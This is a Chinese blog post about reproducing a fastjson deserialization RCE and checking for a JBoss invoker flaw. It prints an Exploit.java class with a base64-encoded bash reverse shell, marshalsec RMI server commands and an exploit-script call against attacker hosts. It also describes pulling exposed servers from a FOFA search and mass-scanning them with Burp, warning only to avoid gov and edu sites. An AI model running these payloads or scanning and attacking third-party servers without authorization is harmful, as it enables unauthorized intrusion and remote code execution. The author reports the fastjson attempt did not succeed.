网站首页 > 技术文章 正文
第一个漏洞复现fastjson漏洞
说明:
在本地这个fastjson会出现问题
复现的过程
生成一个java文件进行攻击注入的方式
javac Exploit.java
但是必须编译成.class文件才能执行
public class Exploit {
static {
try {
String cmd = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}";
Runtime.getRuntime().exec(cmd);
} catch (Exception e) {}
}
}
代码主要就是shell反弹的方式
启动http服务器将文件上传到服务器中进行访问
如果成功访问到.class文件说明成功了
python3 -m http.server --bind 0.0.0.0 8888
打开rmi服务
我不知道这个服务的作用是什么
但是问题总是出现在这个服务互上
"http://x.x.x.x:8888/ 这个对应的攻击主机的地址
9999 是 rmi 端口号
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://x.x.x.x:8888/#Exploit" 9999
组合命令的方式rmi/ladp的方式
java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 9999 "touch /tmp/233"
最后一个就是发送的方式
http://1.1.1.1:8080/ 攻击主机的地址
rmi://2.2.2.2:9999/Exploit rmi 具体服务的地址信息
python3 fastjson-1.2.47_rce.py http://1.1.1.1:8080/ rmi://2.2.2.2:9999/Exploit
但是最后没有成功复现出结果
最后出现问题在我的服务器上面
说没有发送post指令
但是服务器本来没有post请求功能
我在java本地执行window弹出计算机的方式
访问get请求结果真的有计算机进行弹出的方式
搞了挺久还是没有做出来的方式
但是就是没有成功
jboss漏洞复现的方式
这个漏洞验证的方式比较简单一点
http:/ip+端口/invoker/readonly
直接使用这个进行访问
如果出现500错误
证明存在这个错误信息
如果没有我们进行下一个扫描的方式
如果找到大量可以扫描地址
但是需要记住千万不能扫描 gov edu 这个网址
fqfa网络空间查询
我们可以这里查询可以扫描的服务器信息
进行一个扫描的方式
使用burtsuite进行一个批量的查询的方式
但是导出的fqfa把端口和ip分开了我们需要使用notpad++进行组合
然后进行一个暴力扫描的方式
查看网站是否存在这个样的漏洞信息
扫描出来的结果还是比较少的方式
总结
学习网络安全
最主要还是学习思路
如何扫描一个网站,出现什么情况,证明这个网站可以被扫描,出现什么现象我们有机会
这个很重要,如果什么都没有出现,这个网站很难拿下
为什么想学习网络安全
因为安全学习的好
可以参加护网行动
也可以证明自己的技术
猜你喜欢
- 2025-07-28 大模型如何赋能Web渗透测试?(大模型如何赋能web渗透测试工具)
- 2025-07-28 动态切换数据库连接方案(动态切换数据库连接方案是什么)
- 2025-07-28 Apache Tika(apache tika工作流程)
- 2025-07-28 java -jar命令启动SpringBoot应用原理分析
- 2025-07-28 深度探索 Spring Boot3 配置管理:从基础到高级实战
- 2025-07-28 flink sql方式读取kafka实时流数据
- 2025-07-28 小程序源码交付标准详解:必备内容与注意事项
- 2025-07-28 springboot从入门到实战开源的全链路追踪系统介绍及实践!
- 2025-07-28 从原理到落地:MCP在Spring AI中的工程实践
- 2025-07-28 刚搭完HBase集群,Phoenix一启动,HBase就全崩了,是什么原因?
- 最近发表
- 标签列表
-
- axure 注册码 (25)
- mutex_lock (30)
- oracleclient (27)
- nfs (25)
- springbatch (28)
- oracle数据库备份 (25)
- dir (26)
- connectionstring属性尚未初始化 (23)
- output (32)
- panel滚动条 (28)
- centos 5 4 (23)
- sql学习 (33)
- c 数组 (33)
- pascal语言教程 (23)
- ppt 教程 (35)
- java7 (24)
- 自适应网站制作 (32)
- server服务自动停止 (25)
- 超链接去掉下划线 (34)
- 什么是堆栈 (22)
- map entry (25)
- ubuntu装qq (25)
- outputstreamwriter (26)
- fill_parent (22)
- mssqlserver jar (30)